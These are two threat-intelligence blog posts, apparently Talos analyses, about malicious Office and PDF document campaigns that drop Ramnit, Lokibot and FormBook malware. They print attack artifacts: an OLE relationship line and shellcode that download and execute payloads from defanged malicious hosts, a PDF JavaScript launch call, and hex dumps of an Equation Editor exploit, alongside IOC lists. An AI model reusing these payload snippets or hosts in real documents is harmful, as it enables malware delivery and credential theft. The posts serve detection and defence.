CVE-2012-0158</div><br />This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. <br /><br />The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"875\" data-original-width=\"1537\" height=\"364\" src=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Checking the file size and finding file type</div><div style=\"text-align: center;\"><br /></div>The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. Since the CVE-2017-0199 exploiting file is open before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"681\" data-original-width=\"1567\" height=\"278\" src=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode looking for the next shellcode stage marker</div><div style=\"text-align: center;\"><br /></div>The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error by reading memory content past the allocated memory blocks. <br /><br />If the attackers would have been just a little bit more technically savvy they would realize this problem and easily fix it to make these two exploits work together successfully without the prompt to load the remote content being displayed to the end-user. <br /><br />One possible fix involves fixing a single byte to make the file size limits a bit stricter to exclude the original CVE-2017-0199 file size. The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition.<br /><br />Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness. <br /><br /><h3 id=\"h.1g5ixz26t8g5\">Second stage shellcode</h3><br />The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final \"download and execute\" shellcode stage which eventually launches the executable payload.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"933\" data-original-width=\"1600\" height=\"372\" src=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process</div><div style=\"text-align: center;\"><br /></div>The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"575\" data-original-width=\"1350\" height=\"272\" src=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s640/image2.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Download and execute stage</div><br />The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"392\" data-original-width=\"1054\" height=\"238\" src=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s640/image7.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">DNS activity for multplelabs.com</div><br />The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. <br /><br />The DNS activity confirms our findings which document the reasons for the attack failure.<br /><h3 id=\"h.via3e3ir4d9t\">Conclusion</h3><br />CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. <a href=\"https://www.virusbulletin.com/blog/2017/06/cve-2017-0199-new-cve-2012-0158/\">Previous work</a> indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. <br /><br />In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s640/image11.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Attempted combined attack stages</div><br />One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.<br /><br />An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. <br /><br />This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8lbs60io8ukk\">Coverage</h3><br /><a href=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"336\" data-original-width=\"400\" height=\"268\" src=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s320/image8.png\" width=\"320\" /></a>Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Email Security can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.<br /><br />AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.<br /><br />Umbrella prevents DNS resolution of the domains associated with malicious activity.<br /><br />Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><h3 id=\"h.3lh94s3hk6jp\">IOCs</h3><br />Documents<br /><br />5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199<br />6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158<br /><br />Executables<br /><br />351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474<br />f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6<br />43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe<br />d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13<br /><br />URLs<br /><br />hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158<br />hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper<br />hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=tm25zXE3Ntc:BBFLRcVK7jQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/tm25zXE3Ntc\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-08-14T09:55:00", "type": "talosblog", "title": "When combining exploits for added effect goes wrong", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199"], "modified": "2017-08-14T16:55:34", "id": "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/tm25zXE3Ntc/when-combining-exploits-for-added.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-10T22:29:40", "description": "This blog post is authored by [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Paul Rascagneres](<https://twitter.com/r00tbsd>). \n \n\n\n## Summary\n\n \nCisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as \"malware as a service.\" This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. \n \n \n \nThe author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office document) and used two public Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the targeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing platform (hosted in Netherland). The platform owner has since deleted the malicious payload binaries from their system. Here is the infection workflow: \n\n\n[](<https://2.bp.blogspot.com/-9-5OvNxRYYI/Wyn0YYPSOSI/AAAAAAAAAZg/U5l9TdH9gcUZrVo3cRDyBIRyp8LlrTJrgCLcBGAs/s1600/image4.jpg>)\n\n \nWe identified an infrastructure overlap between this campaign and a previous campaign we [published ](<https://blog.talosintelligence.com/2017/02/pony-pub-files.html>)in February 2017 relating to Pony malware which utilized Microsoft Publisher files to deliver its payload. There is the potential that the same actor behind these two attacks is the same due to an overlap in the two attacks' infrastructure. If that is the case, the actor could switch between Pony and FormBook to be able to continue their malicious activities for more than a year. \n \n\n\n## Infection Vector\n\n \n\n\n### Phishing Campaign\n\n \nThis campaign starts with a malicious email containing two attachments. Here is a snippet of the email: \n\n\n[](<https://3.bp.blogspot.com/-PE6m8EWa2J4/Wyn0kEy0EZI/AAAAAAAAAZk/A8sXbiwFwKIjmi2PcOY6CcPXFlyjv4UBQCLcBGAs/s1600/image3.png>)\n\n \nThe email pretends to be an order sent from the sales department of a company located in Spain. The website's details and phone number appear to have been copied from that of a genuine company. \n \nThe email contains two attachments: \n \n\n\n * A blank malicious Microsoft Office document template file. (.dotm)\n * A malicious PDF document that is also blank. (.pdf)\n\n### First Office MalDoc (Attached)\n\n \nThe email contains two attachments as mentioned. One of these is a Microsoft Office document template file. This file type is normally used to share templates. The 'normal.dotm' file is the default Microsoft Word template that opens when Word is launched. The attacker, however, does not use the .dotm file format to share templates, but rather to download an additional Office document. \n \nIf an example document from the campaign, named \"STMORDER-442799.dotm,\" is opened, it appears blank. However, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML information. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the relationship elements within \"STMORDER-442799\\word\\\\_rels\\document.xml.rels.\" Despite the file appearing to be blank, it does contain a large amount of XML information. We see the &lt;Relationship&gt; elements being abused: \n\n \n \n <Relationship Id=\"_id_2970\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" TargetMode=\"External\" Target=\"hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc\"/></Relationships> \n \n\nThis will cause the following document to be downloaded and executed from a Japanese file-hosting platform. \n\n\n[](<https://4.bp.blogspot.com/-J7j3wI6oTCU/Wyn0p8IG41I/AAAAAAAAAZs/-E0raExSblgnH4KGzwnINPClJ8gXc-ytACLcBGAs/s1600/image2.png>)\n\n \nAt the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform maintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform \u2014 this can be found [here](<https://pomf.pyonpyon.moe/malware.txt>). Within this data, we can identify our attempted download of the .doc file, among others related to this campaign, which were removed on the same day, June 8: \n\n\n[](<https://1.bp.blogspot.com/-Yp8oFjbVTT4/Wyn0yE1l9xI/AAAAAAAAAZw/IZs0XpvAJdwtfE8hA1PaNtDk5Y84HMlugCLcBGAs/s1600/image5.png>)\n\nWe were able to obtain multiple .doc files in relation to this campaign, which we will discuss later on. These .doc files are in rich text format (RTF), which leveraged CVE-2017-11882. \n \n\n\n### PDF document (Attached)\n\n \nAlso, attached to the initial email is a PDF file which contains a JavaScript object: \n\n \n \n this.exportDataObject({ cName: \"mine001.dotm\", nLaunch: 2 }); \n \n\nThis code launches a file embedded within the PDF document. In our case, the file is an Office document named \"mine001.dotm.\" \n \n\n\n### Second Office MalDoc (Embedded)\n\n \nThe embedded Office document is exactly the same as the attached document discussed above. We don't know why the author of this campaign puts the same file in two seperate locations, or if it's on purpose or a mistake made during the phishing generation stage. It's possible the actor did not intend to attach both the DOTM and the PDF. \n \n\n\n### Third Office MalDoc (Downloaded)\n\n \nThe final malicious Office document is an RTF document. This RTF document contains an object linking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1): \n\n \n \n 00000040 36 39 30 36 64 30 34 33 30 32 30 30 30 30 30 30 |6906d04302000000| \n 00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530| \n 00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f| \n 00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732| \n 00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000| \n 00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0| \n 000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100| \n 000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \n 000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e| \n 000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006| \n 000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \n 000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001| \n 00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \n \n\nWe have the beginning of the OLE compound file (CF) \u2014 named OLECF \u2014 object. \n \nThis OLECF object contains a compound file binary format (CFBF) object.This file format is described [here](<https://en.wikipedia.org/wiki/Compound_File_Binary_Format>). This object is linked to the COM object \"0002ce02\u20130000\u20130000-c000\u2013000000000046\": \n\n \n \n 00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. .E.n.t.| \n 00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............| \n 00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n * \n 00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................| \n 00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F| \n 00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w| \n 00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................| \n 00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.| \n 00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........| \n 000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n \n\nThis CLSID is the ID of the Equation Editor as mentioned by [Microsoft](<https://support.microsoft.com/fr-fr/help/4055535/how-to-disable-equation-editor-3-0>). Finally, here is where and how the exploit is executed: \n\n \n \n 00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......| \n 00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......| \n 00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.| \n 00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 **1e b6** |....nJ.j.S..A...| \n 00000840 **29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6** |)..q..`#@.@.z...| \n 00000850 **26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be** |&C....N..}.F.E..| \n 00000860 **82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39** |...1..I........9| \n 00000870 **ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6** |...e.)+N........| \n 00000880 **08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83** |...iQ8..''}...e.| \n \n\nThe red value is the stream length. \n \nThe blue value is equation editor MTEF header starting by 0x3. \n \nThe green value is the font record starting by 0x8. This vulnerability is an overflow on the front name located in grey in the snippet above. The overflow will redirect the flow in order to execute the RET code at the address 0x0041d1e8 (in pink). \n \nFinally, a shellcode is executed. \n \nHere is the first stage of the shellcode: \n\n \n \n user@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0 \n mov eax, 0xffba42c3 \n not eax \n mov edi, dword [eax] \n mov esi, dword [edi] \n mov ebp, 0xffb998c6 \n not ebp \n mov ecx, dword [ebp + 0x77] \n push esi \n call ecx \n add eax, 0xb2dd663 \n sub eax, 0xb2dd54d \n jmp eax \n \n\nThe purpose is to execute GlobalLock() (first call) and to finally jump in the second stage of the shellcode in bold orange in the hexadecimal code. \n \nThe purpose is to download and execute a binary located on a compromised WordPress website (hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe). \n \n \n\n\n## Final payload: FormBook\n\n \nThe final payload is located on a compromised WordPress website (hxxp://irishlebanese[.]com/). The malware author stored many PE32 files on this server, some of which are still available. We have included more than 30 hashes of files stored on this server in the IOCs section. The most recent samples are FormBook samples. \n \nFormBook is an inexpensive stealer available as \"malware as a service.\" It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers. \n \n\n\n## Overlaps with previous campaigns\n\n \nIn [February 2017](<https://blog.talosintelligence.com/2017/02/pony-pub-files.html>), we published an article about another stealer using Publisher and a public exploit to compromise systems. We found three interesting samples related to this case and our current FormBook case: \n \n\n\n * 5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at hxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)\n * 82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\n * 8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\n \n \nThese three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous article: \n \n\n\n * hxxp://alphastand[.]top/alien/fre.php -&gt; command and control (C2) server from 2017\n * hxxp://ukonlinejfk[.]ru/mine/fre.php \n * hxxp://alphastand[.]trade/alien/fre.php -&gt; C2 server from 2017\n * hxxp://igtckeep[.]com/dor/fre.php \n * hxxp://alphastand[.]win/alien/fre.php -&gt; C2 server from 2017\n * hxxp://kbfvzoboss[.]bid/alien/fre.php -&gt; C2 server from 2017\n * hxxp://www.cretezzy[.]com/do/ -&gt; FormBook C2 server\n * hxxp://www.beemptty[.]com/se/ -&gt; FormBook C2 server\n \n \nThe infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the timeline, we assume that the actor is currently moving from Pony to FormBook, another stealer. \n \n\n\n## Conclusion\n\n \nThis case shows us that malicious actors play with multiple file formats and embedded objects. In this campaign, the author used a PDF with an embedded Office document template using a vulnerability in order to download an additional Office RTF document, and then a second vulnerability and exploit in order to compromise the target. The attacker used an unfamiliar file-sharing platform in order to store the malicious document and a compromised WordPress site in order to store the final payload. We did notice that the file-sharing platform is reactive, removing the malicious files quickly, stopping the infection chain. \n \nSome technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably the same actor behind a campaign we described one year ago. Last month it used two stealers in parallel on the same infrastructure. Based on the information we have today, he/she no longer uses Pony, but switched to FormBook in order to steal information on compromised systems. \n \n\n\n## Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n\n\n[](<https://3.bp.blogspot.com/-mlMbcYQ3qsI/Wyn1AySpA-I/AAAAAAAAAZ4/nZhPWCs28ZcGmAw112w9dm8l47WVleUbwCLcBGAs/s1600/image1.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n### PDF\n\n8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e \n\n\n### Embedded And Attached dotm\n\n04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c \n\n\n### Malicious Document Hosted On The Files Sharing Platform\n\n4c16046966a5fd06c84213aa67bfa37949800980915e9b511384ec17dc7eb7b1 -&gt; hxxps://pomf[.]pyonpyon[.]moe/pajelx.doc \n04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c -&gt; hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc \n59cf77148cbbf24d395d09192ce43ac5395087f3e499cda350e3a93f13e37de1 -&gt; hxxps://pomf[.]pyonpyon[.]moe/btgppc.doc \nD83f874dda2fa3e4339399c786e9497c1b440019fa5ee5925738fc3afa67352c -&gt; hxxps://pomf[.]pyonpyon[.]moe/ejmhsu.doc \n35ea3d8272751d60bd3106e548444588b1959622dfdcf11be14b80786bdb25e6 -&gt; hxxps://pomf[.]pyonpyon[.]moe/cnlvop.doc \n5e9979a9676889a6656cbfa9ddc1aab2fa4b301155f5b55377a74257c9f9f583 -&gt; hxxps://pomf[.]pyonpyon[.]moe/hbhjks.doc \n0b0615eb8e4c91983fab37475ecc374f79c394768a33ea68c2208da1c03e5a43 -&gt; hxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc \nFccc874f4f741231673f5a3c0bdc4c6bfd07f1b1e93f7c64e2015c393966216e -&gt; hxxps://pomf[.]pyonpyon[.]moe/neitsj.doc \n13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41 -&gt; hxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc \n541ea322a3a6385211566f95cef333580a62341dac397e044a04504625acdd0d -&gt; hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc \n062ae7152d8e8f3abb093e55c5a90213134dd278ac28cfeb18e81132232dcbe8 -&gt; hxxps://pomf[.]pyonpyon[.]moe/tewkco.doc \n0ddf7e87957932650679c99ff2e2380e2be8a203d1142f19a22ad602047f372e -&gt; hxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc \n1debc4e22a40f4f87142e7e40094ce1a9aa10462f0c6d1c29aa272d7d6849205 -&gt; hxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc \n \n\n\n### PE32 Hosted On The irishlebanese Website\n\n \nd7f0f3fea2f9935c1dd7bda343ec1e3fb77457e68b16b9d51516a3d8c651d14f \n05a945fc7a9eb4c9a4db8eb974333b3938c06d9299976075b2fc00a79cf0a129 \n91a471ba534219f05c31d204b3c5217cde7c67f70600aa3abba334888f628376 \nf7e97000615ee77093c4ec49f3cbe4b8cb3dc6feafc74ae8d59f01f05dc4280e \n23c40f55797b07b2d9bf1e314ea928b1151af2b2e605aa520a715fe56e481528 \n1d706a3c85973fe96240a254abff52c0593b4aa0c283d3ecc28df6f8baed853b \ne8f0136abc46b668d44586a6b5a394b470af6af8e9d91bddca4b70e3e66768d1 \n958ee876ebaab71ea2ef9fcda6a08598319578ccc1f4bd9baa3a54114b88abdc \nb031075b8ad2558ee3ee7f0749c2b24484dd6fab7252fad71548276514b9b766 \n667cc420816fd71ae54869b4c0f05129cc5972dbc47f7a98776fc63a72d77691 \n7db8273fd25088900cffa036eb631ffcee40302dd7b33a7d4f3e653e7ab091c0 \n3efdc8b15e324cd9323cdbd34fbd19979d6eeb95fe1120ed3a95dc24fab67397 \n189e2494b19773f9b72072774891378f5809c7bfb121dcba2cee13e6f91ed619 \nbd44861de18d5bbf71d2d64e29ff9f1d8495f97f5ba0b49eacb504b3768a89bb \ne0282f51ac3bfba5774893c8b70c31600d7e4bd7f6d7231fd33315396cd18b78 \n83fa11d8711ef22437681e09a4be500cfaf49ac7cb29837ff6a42fb46b09d789 \n14ce215b561dc43104e400c0eb877d876f6e9be77c5b2994b9b8745b2132d914 \n226d38382415b935d849539c0b6305a4259c26dfa7317b944f8498cd3e65850f \ndd1eeb128b1d1eb40e74281aec79828d7d7179a0375bda5e85ce5fd2fac064a2 \na7422eddb437a33d730ab70bd1267d815fc3761d5eda9781de91d0bdeeb823ff 